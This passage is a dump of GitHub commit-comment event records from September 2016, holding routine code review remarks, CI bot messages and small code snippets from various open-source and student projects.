{"id":"4551727617","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18991287,"position":72,"line":0,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-12T20:36:48Z","updated_at":"2016-09-12T20:36:48Z","body":"That private and sent via friendship and will never changed"}},"created_at":"2016-09-12T20:36:48Z"}
{"id":"4551730010","type":"CommitCommentEvent","actor":{"login":"erikdesjardins"},"repo":{"name":"honestbleeps/Reddit-Enhancement-Suite"},"payload":{"comment":{"id":18991295,"position":null,"line":null,"path":null,"commit_id":"218c1bdae2b2595793d209c5ce50933bc5644b53","created_at":"2016-09-12T20:37:14Z","updated_at":"2016-09-12T20:37:14Z","body":"Neither did I, I just stole it from ESLint :stuck_out_tongue_winking_eye:"}},"created_at":"2016-09-12T20:37:14Z"}
{"id":"4551733702","type":"CommitCommentEvent","actor":{"login":"scottmarlow"},"repo":{"name":"wildfly/wildfly"},"payload":{"comment":{"id":18991307,"position":null,"line":null,"path":null,"commit_id":"3bff5fde3cfc23f3999dc75c320029e69c562c40","created_at":"2016-09-12T20:37:52Z","updated_at":"2016-09-12T20:37:52Z","body":"I agree with this change, would you be willing to contribute it via a WildFly pull request?  I think that a new WFLY-nnn jira is needed, as https://issues.jboss.org/browse/WFLY-7075 is for the extension idea."}},"created_at":"2016-09-12T20:37:52Z"}
{"id":"4551738643","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18991323,"position":18,"line":0,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-12T20:38:45Z","updated_at":"2016-09-12T20:38:45Z","body":"Okay, thanks for fix ;-)"}},"created_at":"2016-09-12T20:38:45Z"}
{"id":"4551739053","type":"CommitCommentEvent","actor":{"login":"rlrossiter"},"repo":{"name":"ctrath/ursula-cli"},"payload":{"comment":{"id":18991324,"position":66,"line":537,"path":"ursula_cli/shell.py","commit_id":"c1d8cc8b8c87f4dabf3e000be1f0952f66e551b4","created_at":"2016-09-12T20:38:50Z","updated_at":"2016-09-12T20:38:50Z","body":"I don't want to bikeshed on this too hard, but I'm a lazy bum and hate typing, so I would rather have it be either 1) openstack, or 2) shade"}},"created_at":"2016-09-12T20:38:50Z"}
{"id":"4551740290","type":"CommitCommentEvent","actor":{"login":"Jonester"},"repo":{"name":"Jonester/ObjectiveCAssignment1"},"payload":{"comment":{"id":18991329,"position":null,"line":null,"path":null,"commit_id":"ec59d084adeaadecb2c43c2dba8c8ce756bca6f4","created_at":"2016-09-12T20:39:04Z","updated_at":"2016-09-12T20:39:04Z","body":"Assignment #1 for iOS boot camp. "}},"created_at":"2016-09-12T20:39:04Z"}
{"id":"4551760536","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18991394,"position":103,"line":224,"path":"desktop/src/com/frostwire/gui/updates/InstallerUpdater.java","commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T20:42:46Z","updated_at":"2016-09-12T20:42:46Z","body":"hmm... wish we had an easier way to compare torrent handles."}},"created_at":"2016-09-12T20:42:46Z"}
{"id":"4551765144","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18991404,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T20:43:39Z","updated_at":"2016-09-12T20:43:39Z","body":"What explosion types besides vehicles blowing up cause a null source? Hand grenades and any thrown item will not have a null source (source will be the throwing player). Satchels and mines are not a null source either, they have a source of the player who placed them. Explosions from vehicle missiles and bombs will have a damage source of the vehicle driver/commander. You can get this info easily via:\r\n```sqf\r\nplayer addEventHandler [\"HandleDamage\",{systemChat str(_this); diag_log str(_this);}];\r\n```\r\nInfistar blocks all damage from null sources in his damage handler and AFAIK it doesn't cause any major problems. In this case we are only blocking it when there isn't a moving vehicle in close vicinity."}},"created_at":"2016-09-12T20:43:39Z"}
{"id":"4551767328","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18991409,"position":115,"line":236,"path":"desktop/src/com/frostwire/gui/updates/InstallerUpdater.java","commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T20:44:04Z","updated_at":"2016-09-12T20:44:04Z","body":"can't this be `BTEngine.getInstance().removeListener(this)`?\r\n\r\nI've seen how you skip the `.session()` in other fixes."}},"created_at":"2016-09-12T20:44:04Z"}
{"id":"4551767566","type":"CommitCommentEvent","actor":{"login":"hrlourenco"},"repo":{"name":"hrlourenco/WeatherAndroid"},"payload":{"comment":{"id":18991410,"position":null,"line":null,"path":null,"commit_id":"0eaca4427bc87d9e2e8e9a752fc1719a468eeac5","created_at":"2016-09-12T20:44:07Z","updated_at":"2016-09-12T20:44:07Z","body":"hh"}},"created_at":"2016-09-12T20:44:07Z"}
{"id":"4551768284","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18991413,"position":103,"line":224,"path":"desktop/src/com/frostwire/gui/updates/InstallerUpdater.java","commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T20:44:16Z","updated_at":"2016-09-12T20:44:16Z","body":"it was always the same, only that hidden in the `TorrentAdapter`, this works in the native side, the penalty is only passing around the pointers"}},"created_at":"2016-09-12T20:44:16Z"}
{"id":"4551771838","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18991422,"position":115,"line":236,"path":"desktop/src/com/frostwire/gui/updates/InstallerUpdater.java","commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T20:44:54Z","updated_at":"2016-09-12T20:44:54Z","body":"not yet, that's the goal, but it's a delicate process..."}},"created_at":"2016-09-12T20:44:54Z"}
{"id":"4551773661","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18991428,"position":128,"line":248,"path":"desktop/src/com/frostwire/gui/updates/InstallerUpdater.java","commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T20:45:14Z","updated_at":"2016-09-12T20:45:14Z","body":"same here"}},"created_at":"2016-09-12T20:45:14Z"}
{"id":"4551780095","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18991440,"position":null,"line":null,"path":null,"commit_id":"48908902ee1ad1fd04b86daeea82f1a6df4a2480","created_at":"2016-09-12T20:46:20Z","updated_at":"2016-09-12T20:46:20Z","body":"Formula sense is check top collision instead side if player's x speed more than y and bottom lower than top of block in 2 px. Because moving down - easy to catch, because block already cares to catch player. But when moving up, need to add extra offset to let payer catch hole."}},"created_at":"2016-09-12T20:46:20Z"}
{"id":"4551782406","type":"CommitCommentEvent","actor":{"login":"vshl"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18991446,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-12T20:46:44Z","updated_at":"2016-09-12T20:46:44Z","body":"My bad, I assumed otherwise. That will make things simpler. Thanks for the link. I'll read through it."}},"created_at":"2016-09-12T20:46:44Z"}
{"id":"4551796177","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18991469,"position":null,"line":null,"path":null,"commit_id":"146cfc1c33241bfecf0b97fd06bcee4f3068bcc7","created_at":"2016-09-12T20:49:16Z","updated_at":"2016-09-12T20:49:16Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 25](http://teamcity.otenv.com/viewLog.html?buildId=5196405&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-12T20:49:16Z"}
{"id":"4551797435","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18991472,"position":115,"line":236,"path":"desktop/src/com/frostwire/gui/updates/InstallerUpdater.java","commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T20:49:28Z","updated_at":"2016-09-12T20:49:28Z","body":"yeah, I see how in the parent you have also a `session`, but it's not a `Session` like on BTEngine, it's a swig `session`"}},"created_at":"2016-09-12T20:49:28Z"}
{"id":"4551805460","type":"CommitCommentEvent","actor":{"login":"AdFad666"},"repo":{"name":"opengapps/aosp_build"},"payload":{"comment":{"id":18991487,"position":null,"line":null,"path":null,"commit_id":"01d7b3020c436211172d805416259d69f6fcf6c4","created_at":"2016-09-12T20:50:55Z","updated_at":"2016-09-12T20:50:55Z","body":"perhaps you should also mention arm64 depends on arm, it's not obvious from the docs"}},"created_at":"2016-09-12T20:50:55Z"}
{"id":"4551805826","type":"CommitCommentEvent","actor":{"login":"cytrowski"},"repo":{"name":"infoshareacademy/jfdz2-livecoding"},"payload":{"comment":{"id":18991489,"position":101,"line":93,"path":"app.js","commit_id":"42aa71884723b8b4ce94ec1bdd60cbdfbb8fc85a","created_at":"2016-09-12T20:51:00Z","updated_at":"2016-09-12T20:51:00Z","body":"`updateFriendsDropdown()` oraz `updateFriends()` występują zawsze parami - w trzech miejscach. Napisałbym funkcję, która wywołuje je obie na raz i wykorzystywałbym ją zamiast wywoływania ich w parach."}},"created_at":"2016-09-12T20:51:00Z"}
{"id":"4551806084","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18991490,"position":null,"line":null,"path":null,"commit_id":"146cfc1c33241bfecf0b97fd06bcee4f3068bcc7","created_at":"2016-09-12T20:51:03Z","updated_at":"2016-09-12T20:51:03Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 25](http://teamcity.otenv.com/viewLog.html?buildId=5196405&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:01:46"}},"created_at":"2016-09-12T20:51:03Z"}
{"id":"4551806626","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18991491,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T20:51:10Z","updated_at":"2016-09-12T20:51:10Z","body":"I was unable to kill myself with satchels, also i have had instances of the BIS_effects killed not triggering and my player going underground as a result."}},"created_at":"2016-09-12T20:51:10Z"}
{"id":"4551807485","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18991495,"position":48,"line":1234,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T20:51:20Z","updated_at":"2016-09-12T20:51:20Z","body":"The alternatives involve some type of memory allocation for the key/value string, something I'm trying to avoid. Yeah, we need to devise some way of informing clients what the state of the object is, so they don't access corrupted data."}},"created_at":"2016-09-12T20:51:20Z"}
{"id":"4551808372","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18991498,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T20:51:29Z","updated_at":"2016-09-12T20:51:29Z","body":"een int die gelijk is aan de som van de returns van die 3 methodes en kijken of dat 3 is, als het 3 is stoppen. Dan heb je enkel de lussen in die 3 methodes en niet de lussen in isEmpty, wat dim^2 iteraties minder is per stap in de while. Op het einde van alle functies kan je dan controleren of het is opgelost. \r\n\r\nDit zijn ook de 3 simpelste methodes en ik heb geprobeerd om elk vakje +- maar 1 keer te overlopen (die 3 methodes hebben enkel een dubbele for). Ik zou dus telkens die 3 laten lopen tot ze vast zitten, dan een ingewikkelde methode(eliminate_impossible_other_combos,...) en als de ingewikkelde iets veranderd hebben, terug met de simpele beginnen. En als ze allemaal niet meer zorgen (of een max aantal iteraties is overschreden) dan controleren met hasEmpty."}},"created_at":"2016-09-12T20:51:29Z"}
{"id":"4551809608","type":"CommitCommentEvent","actor":{"login":"catarak"},"repo":{"name":"processing/p5.js-web-editor"},"payload":{"comment":{"id":18991505,"position":null,"line":null,"path":null,"commit_id":"00c979a763ee216e144cf8253e19a676793fa612","created_at":"2016-09-12T20:51:44Z","updated_at":"2016-09-12T20:51:44Z","body":"I haven't run into that issue with saving, though sometimes I'll see that error if I leave the app running for a while, or I edit some server-side code which is some incorrect JavaScript. I haven't figured out how to make it happen consistently though. I'll do some Googling and see if I can figure out how to make it happen less.\r\n\r\nLooking at your gist, I think the issue is `e.key === '13'`. When I `console.log` the keyboard event when I press enter, I see\r\n<img width=\"652\" alt=\"screen shot 2016-09-12 at 4 50 33 pm\" src=\"https://cloud.githubusercontent.com/assets/6063380/18452522/2705005a-7909-11e6-8943-5079878d44cb.png\">\r\nand from that, you can see e.key is `'Enter'`.\r\n"}},"created_at":"2016-09-12T20:51:44Z"}
{"id":"4551812879","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18991512,"position":null,"line":null,"path":null,"commit_id":"03fcdb0e259be1558de868e7f8c473716d5aa199","created_at":"2016-09-12T20:52:20Z","updated_at":"2016-09-12T20:52:20Z","body":"ok, we kunnen ze later nog wegdoen"}},"created_at":"2016-09-12T20:52:20Z"}
{"id":"4551815935","type":"CommitCommentEvent","actor":{"login":"jowens"},"repo":{"name":"gunrock/gunrock"},"payload":{"comment":{"id":18991520,"position":null,"line":null,"path":null,"commit_id":"f7e2d1ef6cae11c326046ea28e5fa0fb1758ef48","created_at":"2016-09-12T20:52:50Z","updated_at":"2016-09-12T20:52:50Z","body":"There's a bunch of similar warnings in test_pr.cu as well, yeah?"}},"created_at":"2016-09-12T20:52:50Z"}
{"id":"4551826311","type":"CommitCommentEvent","actor":{"login":"Strubbl"},"repo":{"name":"wallabag/android-app"},"payload":{"comment":{"id":18991541,"position":5,"line":31,"path":"app/src/main/java/fr/gaulupeau/apps/Poche/ui/IconUnreadWidget.java","commit_id":"46a6fca02ac76f084c90bd013b55e225c488468d","created_at":"2016-09-12T20:54:39Z","updated_at":"2016-09-12T20:54:39Z","body":"Wow, good catch! Thank you"}},"created_at":"2016-09-12T20:54:39Z"}
{"id":"4551839980","type":"CommitCommentEvent","actor":{"login":"justinmimbs"},"repo":{"name":"thebritican/elm-calendar"},"payload":{"comment":{"id":18991571,"position":null,"line":null,"path":null,"commit_id":"6ffe37b1273da07f04788806366721e7e90d3b9c","created_at":"2016-09-12T20:57:01Z","updated_at":"2016-09-12T20:57:01Z","body":"Hi Greg,\r\n\r\nLooking good! I just came across this, and I know it's a work in progress, so I hope you don't mind, but I wanted to point out that you can use Date.Extra to `floor` and `ceiling` to any day of the week too. That can help simplify steps like those in `getMonthRange`:\r\n\r\n```elm\r\ngetMonthRange : Date -> List (List Date)\r\ngetMonthRange date =\r\n    let\r\n        firstOfMonth =\r\n            Date.Extra.floor Date.Extra.Month date\r\n        \r\n        firstOfNextMonth =\r\n            Date.Extra.add Date.Extra.Month 1 firstOfMonth\r\n    in\r\n        Date.Extra.range Date.Extra.Day 1\r\n            (Date.Extra.floor Date.Extra.Sunday firstOfMonth)\r\n            (Date.Extra.ceiling Date.Extra.Sunday firstOfNextMonth)\r\n        |> List.Extra.groupsOf 7\r\n```\r\n \r\nIt's something I find useful, so I thought you might too. :)"}},"created_at":"2016-09-12T20:57:01Z"}
{"id":"4551840610","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18991573,"position":null,"line":null,"path":null,"commit_id":"3ae31eefaa7aa71fc2988ca2df4916209217d184","created_at":"2016-09-12T20:57:11Z","updated_at":"2016-09-12T20:57:11Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/aws-s3-drupal](https://peterpanth-static-docs.pantheonsite.io/docs/aws-s3-drupal)\n- [docs/content-delivery-network](https://peterpanth-static-docs.pantheonsite.io/docs/content-delivery-network)\n- [docs/drupal-s3](https://peterpanth-static-docs.pantheonsite.io/docs/drupal-s3)\n- [docs/wordpress-cloudfront](https://peterpanth-static-docs.pantheonsite.io/docs/wordpress-cloudfront)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/7762d4bd6d0e93ee86c82a2580f2373475af18e6/app/config/sculpin_site.yml)\n"}},"created_at":"2016-09-12T20:57:11Z"}
{"id":"4551841329","type":"CommitCommentEvent","actor":{"login":"francoislg"},"repo":{"name":"coveo/search-ui"},"payload":{"comment":{"id":18991576,"position":13,"line":105,"path":"src/ui/Recommendation/Recommendation.ts","commit_id":"d97f964ba5c028fddb2b98bdc37c7f2c25e9de53","created_at":"2016-09-12T20:57:17Z","updated_at":"2016-09-12T20:57:17Z","body":"I think it's missing a `if (this.options.hideIfNoResults) { this. hide() }` here."}},"created_at":"2016-09-12T20:57:17Z"}
{"id":"4551851055","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18991594,"position":50,"line":1236,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T20:59:03Z","updated_at":"2016-09-12T20:59:03Z","body":"would LexicographicOrder() be clearer? The actual algorithm involves more than just endian conversion. We need to handle sign bits, mantissa vs exponent for floating point.\r\n\r\nIn some cases, people resort to techniques such as BCD to handle byte arrays that can have null bytes.\r\n\r\nhttps://github.com/ndimiduk/orderly/blob/master/orderly-core/src/main/java/orderly/VariableLengthBytesWritableRowKey.java#L29"}},"created_at":"2016-09-12T20:59:03Z"}
{"id":"4551855139","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18991600,"position":59,"line":1245,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T20:59:45Z","updated_at":"2016-09-12T20:59:45Z","body":"I like FlatBufferOrderFields."}},"created_at":"2016-09-12T20:59:45Z"}
{"id":"4551856105","type":"CommitCommentEvent","actor":{"login":"DavidKleinberg"},"repo":{"name":"hermshermsherms/invest-code-eclipse"},"payload":{"comment":{"id":18991601,"position":null,"line":null,"path":null,"commit_id":"e9da253615dc9341f382c7bc00b3c6fb9592663c","created_at":"2016-09-12T20:59:56Z","updated_at":"2016-09-12T20:59:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CQBux0lA&#x2F;1-mapping-a-clean-trend\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Mapping a &quot;Clean&quot; Trend</a>"}},"created_at":"2016-09-12T20:59:56Z"}
{"id":"4551857414","type":"CommitCommentEvent","actor":{"login":"evan70"},"repo":{"name":"jbroadway/elefant"},"payload":{"comment":{"id":18991602,"position":null,"line":null,"path":null,"commit_id":"26e0d4d620748ada07ce082e1e5ee0f359d4888e","created_at":"2016-09-12T21:00:14Z","updated_at":"2016-09-12T21:00:14Z","body":"but http://install is not available now :)"}},"created_at":"2016-09-12T21:00:14Z"}
{"id":"4551859464","type":"CommitCommentEvent","actor":{"login":"OldSnake22"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18991609,"position":null,"line":null,"path":null,"commit_id":"b22768227f2e0c00ec85bfb02a81826b4e04ecca","created_at":"2016-09-12T21:00:36Z","updated_at":"2016-09-12T21:00:36Z","body":"Amazing ! Is it working with deferred render path ? I heard that alpha to coverage require MSAA support ? "}},"created_at":"2016-09-12T21:00:36Z"}
{"id":"4551865899","type":"CommitCommentEvent","actor":{"login":"gedesigntech"},"repo":{"name":"perrah/px-login"},"payload":{"comment":{"id":18991622,"position":null,"line":null,"path":null,"commit_id":"6ff3a9d6883c8df48d1b14d8006a3bce8ce4f96b","created_at":"2016-09-12T21:01:44Z","updated_at":"2016-09-12T21:01:44Z","body":"hi @perrah thanks for the fix to this issue of px-login.  There are other items in our list for px-login, and we are looking into addressing all of them in possibly a major re-work of the component.  Please stay tuned for updates."}},"created_at":"2016-09-12T21:01:44Z"}
{"id":"4551866793","type":"CommitCommentEvent","actor":{"login":"gabriel"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":18991624,"position":24,"line":72,"path":"react-native/gobuild.sh","commit_id":"5ceadb1a6153d63aaa2848fc5368b77d5dbed02e","created_at":"2016-09-12T21:01:53Z","updated_at":"2016-09-12T21:01:53Z","body":"echo \"Doing"}},"created_at":"2016-09-12T21:01:53Z"}
{"id":"4551871030","type":"CommitCommentEvent","actor":{"login":"EinarasGar"},"repo":{"name":"EinarasGar/ArduPlayer"},"payload":{"comment":{"id":18991630,"position":4,"line":10,"path":"ArduPlayer/ArduPlayeris.sln","commit_id":"428b3988be98895535a1b9842f142ecdb1d702e5","created_at":"2016-09-12T21:02:39Z","updated_at":"2016-09-12T21:02:39Z","body":"Changed .ino file name, because compiler needed folder with the same name as the filename"}},"created_at":"2016-09-12T21:02:39Z"}
{"id":"4551879071","type":"CommitCommentEvent","actor":{"login":"jbroadway"},"repo":{"name":"jbroadway/elefant"},"payload":{"comment":{"id":18991641,"position":null,"line":null,"path":null,"commit_id":"26e0d4d620748ada07ce082e1e5ee0f359d4888e","created_at":"2016-09-12T21:04:08Z","updated_at":"2016-09-12T21:04:08Z","body":"Did I break the forward to `/install`? That should only be a relative link anyway. "}},"created_at":"2016-09-12T21:04:08Z"}
{"id":"4551890208","type":"CommitCommentEvent","actor":{"login":"sweetkristas"},"repo":{"name":"anura-engine/anura"},"payload":{"comment":{"id":18991656,"position":4,"line":28,"path":"src/sound.cpp","commit_id":"7d05878b3566277efcb802f55f66b78796570a6d","created_at":"2016-09-12T21:06:05Z","updated_at":"2016-09-12T21:06:05Z","body":"Really? What drugs were you taking at the time to decide adding this was a good idea?"}},"created_at":"2016-09-12T21:06:05Z"}
{"id":"4551890807","type":"CommitCommentEvent","actor":{"login":"Tratcher"},"repo":{"name":"aspnet/Hosting"},"payload":{"comment":{"id":18991658,"position":36,"line":52,"path":"src/Microsoft.AspNetCore.TestHost/ResponseFeature.cs","commit_id":"a395788d67f1d17daa7202d0eadbd7df6be8b4ff","created_at":"2016-09-12T21:06:13Z","updated_at":"2016-09-12T21:06:13Z","body":"Try/Finally, all OnCompleted handlers should run even in error conditions"}},"created_at":"2016-09-12T21:06:13Z"}
{"id":"4551895759","type":"CommitCommentEvent","actor":{"login":"mvasilkov"},"repo":{"name":"MattiaFortunati/glitchicken"},"payload":{"comment":{"id":18991670,"position":768,"line":768,"path":"src/js/game.js","commit_id":"a03e21adca1cac4cda395237cbd429a066911cba","created_at":"2016-09-12T21:07:07Z","updated_at":"2016-09-12T21:07:07Z","body":"Brilliant! I literally laughed out loud when I got to this stage in game. So much win 😂"}},"created_at":"2016-09-12T21:07:07Z"}
{"id":"4551900103","type":"CommitCommentEvent","actor":{"login":"Tratcher"},"repo":{"name":"aspnet/Hosting"},"payload":{"comment":{"id":18991678,"position":42,"line":204,"path":"src/Microsoft.AspNetCore.TestHost/ClientHandler.cs","commit_id":"aff23684e8c1db8592985dc98f7387c005d79eae","created_at":"2016-09-12T21:07:51Z","updated_at":"2016-09-12T21:07:51Z","body":"I think this one was deliberately not awaited, we didn't want to be blocked by the client."}},"created_at":"2016-09-12T21:07:51Z"}
{"id":"4551900408","type":"CommitCommentEvent","actor":{"login":"sgpyc"},"repo":{"name":"gunrock/gunrock"},"payload":{"comment":{"id":18991680,"position":null,"line":null,"path":null,"commit_id":"f7e2d1ef6cae11c326046ea28e5fa0fb1758ef48","created_at":"2016-09-12T21:07:55Z","updated_at":"2016-09-12T21:07:55Z","body":"fixed in 767e330"}},"created_at":"2016-09-12T21:07:55Z"}
{"id":"4551903799","type":"CommitCommentEvent","actor":{"login":"wuwenjie2233"},"repo":{"name":"wuwenjie2233/ExData_Plotting1"},"payload":{"comment":{"id":18991690,"position":98,"line":96,"path":"README.md","commit_id":"3edfc828f063ecc7c71a99705da11d7018b9829c","created_at":"2016-09-12T21:08:31Z","updated_at":"2016-09-12T21:08:31Z","body":"dataFile <- \"./data/household_power_consumption.txt\"\r\ndata <- read.table(dataFile, header=TRUE, sep=\";\", stringsAsFactors=FALSE, dec=\".\")\r\nsubSetData <- data[data$Date %in% c(\"1/2/2007\",\"2/2/2007\") ,]\r\n\r\n#str(subSetData)\r\nglobalActivePower <- as.numeric(subSetData$Global_active_power)\r\npng(\"plot1.png\", width=480, height=480)\r\nhist(globalActivePower, col=\"red\", main=\"Global Active Power\", xlab=\"Global Active Power (kilowatts)\")\r\ndev.off()"}},"created_at":"2016-09-12T21:08:31Z"}
{"id":"4551904978","type":"CommitCommentEvent","actor":{"login":"Tratcher"},"repo":{"name":"aspnet/Hosting"},"payload":{"comment":{"id":18991694,"position":34,"line":101,"path":"src/Microsoft.AspNetCore.TestHost/ResponseStream.cs","commit_id":"aff23684e8c1db8592985dc98f7387c005d79eae","created_at":"2016-09-12T21:08:44Z","updated_at":"2016-09-12T21:08:44Z","body":"Wait"}},"created_at":"2016-09-12T21:08:44Z"}
{"id":"4551906921","type":"CommitCommentEvent","actor":{"login":"jonallured"},"repo":{"name":"hashrocket/dotmatrix"},"payload":{"comment":{"id":18991701,"position":null,"line":null,"path":null,"commit_id":"8a8382ccc4f1cd65dbbe66053d7ba99247eeac90","created_at":"2016-09-12T21:09:07Z","updated_at":"2016-09-12T21:09:07Z","body":"❤️ ❤️ ❤️ "}},"created_at":"2016-09-12T21:09:07Z"}
{"id":"4551909469","type":"CommitCommentEvent","actor":{"login":"wuwenjie2233"},"repo":{"name":"wuwenjie2233/ExData_Plotting1"},"payload":{"comment":{"id":18991717,"position":104,"line":102,"path":"README.md","commit_id":"3edfc828f063ecc7c71a99705da11d7018b9829c","created_at":"2016-09-12T21:09:33Z","updated_at":"2016-09-12T21:09:33Z","body":"dataFile <- \"./data/household_power_consumption.txt\"\r\ndata <- read.table(dataFile, header=TRUE, sep=\";\", stringsAsFactors=FALSE, dec=\".\")\r\nsubSetData <- data[data$Date %in% c(\"1/2/2007\",\"2/2/2007\") ,]\r\n\r\n#str(subSetData)\r\ndatetime <- strptime(paste(subSetData$Date, subSetData$Time, sep=\" \"), \"%d/%m/%Y %H:%M:%S\") \r\nglobalActivePower <- as.numeric(subSetData$Global_active_power)\r\npng(\"plot2.png\", width=480, height=480)\r\nplot(datetime, globalActivePower, type=\"l\", xlab=\"\", ylab=\"Global Active Power (kilowatts)\")\r\ndev.off(）"}},"created_at":"2016-09-12T21:09:33Z"}
{"id":"4551911062","type":"CommitCommentEvent","actor":{"login":"robbee"},"repo":{"name":"twigy/twigy-server"},"payload":{"comment":{"id":18991724,"position":null,"line":null,"path":null,"commit_id":"76f7d0c89558240740191e547b8cad9cb1d98a41","created_at":"2016-09-12T21:09:51Z","updated_at":"2016-09-12T21:09:51Z","body":"Après debug : Ca marche pas mal... Coté messenger ca semble fonctionner. En revanche la requête est mauvaise. Le bot renvoie tous (trop) de twig (y compris les passé de la journée en cours et les twigs déjà affectés) ++\r\n\r\n"}},"created_at":"2016-09-12T21:09:51Z"}
{"id":"4551915124","type":"CommitCommentEvent","actor":{"login":"davewasmer"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":18991736,"position":146,"line":146,"path":"lib/runtime/mailer.js","commit_id":"285fa16c0ee14278576193bb9d2afdb364e0bc2a","created_at":"2016-09-12T21:10:31Z","updated_at":"2016-09-12T21:10:31Z","body":"Erm, nowhere apparently. The mailer stuff is a bit WIP still, as you can see"}},"created_at":"2016-09-12T21:10:31Z"}
{"id":"4551917536","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18991746,"position":null,"line":null,"path":null,"commit_id":"9aa5b6a5a09a2c14dc7ed39413bcf532924d4e7c","created_at":"2016-09-12T21:10:57Z","updated_at":"2016-09-12T21:10:57Z","body":"You forgot change this?\r\n\r\n`\t\t\tint32_t attack, defense, extraDefense;\r\n\t\t\tif (item) {\r\n\t\t\t\tattack = item->getAttack();\r\n\t\t\t\tdefense = item->getDefense();\r\n\t\t\t\textraDefense = item->getExtraDefense();\r\n\t\t\t} else {\r\n\t\t\t\tattack = it.attack;\r\n\t\t\t\tdefense = it.defense;\r\n\t\t\t\textraDefense = it.extraDefense;\r\n\t\t\t}`\r\n\r\nto:\r\n\r\n`\t\t\tint32_t attack, defense, extraDefense, shootRange;\r\n\t\t\tif (item) {\r\n\t\t\t\tattack = item->getAttack();\r\n\t\t\t\tdefense = item->getDefense();\r\n\t\t\t\textraDefense = item->getExtraDefense();\r\n\t\t\t\tshootRange = item->getShootRange();\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tattack = 